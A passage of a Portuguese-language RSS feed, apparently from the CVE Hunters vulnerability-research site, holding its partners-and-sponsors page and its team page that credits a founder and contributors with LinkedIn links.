        <guid>https://www.cvehunters.com/pt/support/</guid>
        <description>&amp;lt;p&amp;gt;Saiba mais sobre nossos parceiros e patrocinadores abaixo:&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;parceiros&amp;#34;&amp;gt;Parceiros
&amp;lt;/h2&amp;gt;&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://azure.microsoft.com/pt-br/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/support/azure.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://caido.io/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/support/caido.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://hacktiba.github.io/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/support/hacktiba.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://azure.microsoft.com/pt-br/&amp;#34;&amp;gt;Azure&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://caido.io/&amp;#34;&amp;gt;caido&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://hacktiba.github.io/&amp;#34;&amp;gt;Hacktiba&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://vuldb.com/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/support/vuldb.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://vuldb.com/&amp;#34;&amp;gt;VulDB&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;h2 id=&amp;#34;patrocinadores&amp;#34;&amp;gt;Patrocinadores
&amp;lt;/h2&amp;gt;&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://institutoumpassodecadavez.org/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;instituto-um-passo-de-cada-vez.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://future.com.br/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;future.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://institutoumpassodecadavez.org/&amp;#34;&amp;gt;Instituto Um Passo&amp;lt;/br&amp;gt;de Cada Vez&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://future.com.br/&amp;#34;&amp;gt;future&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;</description><content:encoded>&amp;lt;p&amp;gt;Saiba mais sobre nossos parceiros e patrocinadores abaixo:&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;parceiros&amp;#34;&amp;gt;Parceiros
&amp;lt;/h2&amp;gt;&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://azure.microsoft.com/pt-br/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/support/azure.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://caido.io/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/support/caido.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://hacktiba.github.io/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/support/hacktiba.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://azure.microsoft.com/pt-br/&amp;#34;&amp;gt;Azure&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://caido.io/&amp;#34;&amp;gt;caido&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://hacktiba.github.io/&amp;#34;&amp;gt;Hacktiba&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://vuldb.com/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/support/vuldb.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://vuldb.com/&amp;#34;&amp;gt;VulDB&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;h2 id=&amp;#34;patrocinadores&amp;#34;&amp;gt;Patrocinadores
&amp;lt;/h2&amp;gt;&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://institutoumpassodecadavez.org/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;instituto-um-passo-de-cada-vez.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://future.com.br/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;future.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://institutoumpassodecadavez.org/&amp;#34;&amp;gt;Instituto Um Passo&amp;lt;/br&amp;gt;de Cada Vez&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://future.com.br/&amp;#34;&amp;gt;future&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;</content:encoded>
        <pubDate>Mon, 01 Jan 0001 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>Equipe</title>
        <link>https://www.cvehunters.com/pt/team/</link>
        <guid>https://www.cvehunters.com/pt/team/</guid>
        <description>&amp;lt;p&amp;gt;Você pode encontrar links úteis para repositórios e colaboradores abaixo:&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;fundador&amp;#34;&amp;gt;Fundador
&amp;lt;/h2&amp;gt;&amp;lt;table border=&amp;#34;1&amp;#34; style=&amp;#34;max-width: 155px;&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/natan.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;&amp;gt;Natan Maia&amp;lt;br&amp;gt; Morette&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;h2 id=&amp;#34;colaboradores&amp;#34;&amp;gt;Colaboradores
&amp;lt;/h2&amp;gt;&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/angelo.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/diego.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/elisangela.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/&amp;#34;&amp;gt;Angelo&amp;lt;br&amp;gt;Morette&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;&amp;gt;Diego&amp;lt;br&amp;gt;Castro&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;&amp;gt;Elisângela&amp;lt;br&amp;gt;Mendonça&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/f%C3%AAmartins/&amp;#34;&amp;gt;
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/isadora-cristina-a0580014b/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/isadora.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/itauan&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/itauan.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/f%C3%AAmartins/&amp;#34;&amp;gt;Fernanda&amp;lt;br&amp;gt;Martins&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/isadora-cristina-a0580014b/&amp;#34;&amp;gt;Isadora&amp;lt;br&amp;gt;Novaes&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/itauan&amp;#34;&amp;gt;Itauan&amp;lt;br&amp;gt;Santos&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/karina.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/marcelo.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/marcos-tolosa/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/marcos.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;&amp;gt;Karina&amp;lt;br&amp;gt;Gante&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;&amp;gt;Marcelo&amp;lt;br&amp;gt;Queiroz&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/marcos-tolosa/&amp;#34;&amp;gt;Marcos&amp;lt;br&amp;gt;Tolosa&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/pedro-henrique-da-costa-lyrio-020a401a3?utm_source=share&amp;amp;utm_campaign=share_via&amp;amp;utm_content=profile&amp;amp;utm_medium=android_app&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/pedro.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/rafael.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/raul.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/pedro-henrique-da-costa-lyrio-020a401a3?utm_source=share&amp;amp;utm_campaign=share_via&amp;amp;utm_content=profile&amp;amp;utm_medium=android_app&amp;#34;&amp;gt;Pedro&amp;lt;br&amp;gt;Lyrio&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;&amp;gt;Rafael&amp;lt;br&amp;gt;Corvino&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;&amp;gt;Raul&amp;lt;br&amp;gt;Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/samaragama?utm_source=share&amp;amp;utm_campaign=share_via&amp;amp;utm_content=profile&amp;amp;utm_medium=ios_app&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/samara.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/ta%C3%ADza-oliveira&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/taiza.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://br.linkedin.com/in/thiagoescarrone&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/thiago.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/samaragama?utm_source=share&amp;amp;utm_campaign=share_via&amp;amp;utm_content=profile&amp;amp;utm_medium=ios_app&amp;#34;&amp;gt;Samara&amp;lt;br&amp;gt;Gama&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/ta%C3%ADza-oliveira&amp;#34;&amp;gt;Taíza&amp;lt;br&amp;gt;Oliveira&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://br.linkedin.com/in/thiagoescarrone&amp;#34;&amp;gt;Thiago&amp;lt;br&amp;gt;Escarrone&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/vanderlei-princival/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/vanderlei.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;http://www.linkedin.com/in/vinicius-gross-castro&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/viniciusCastro.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt;
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/vinicius-marim-melfi-4b937b155/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/vinicius.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/vanderlei-princival/&amp;#34;&amp;gt;Vanderlei&amp;lt;br&amp;gt;Princival&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;http://www.linkedin.com/in/vinicius-gross-castro&amp;#34;&amp;gt;Vinicius&amp;lt;br&amp;gt;Castro&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/vinicius-marim-melfi-4b937b155/&amp;#34;&amp;gt;Vinícius&amp;lt;br&amp;gt;Melfi&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/yago-dyogennes/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/assets/contributors/yago.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
        &amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center; font-weight: bold;&amp;#34;&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/yago-dyogennes/&amp;#34;&amp;gt;Yago&amp;lt;br&amp;gt;Dyogennes&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;h2 id=&amp;#34;repositório&amp;#34;&amp;gt;Repositório
&amp;lt;/h2&amp;gt;&amp;lt;table border=&amp;#34;1&amp;#34; style=&amp;#34;max-width: 155px;&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/team/cve-hunters-logo.png&amp;#34; width=&amp;#34;100&amp;#34;/&amp;gt; 
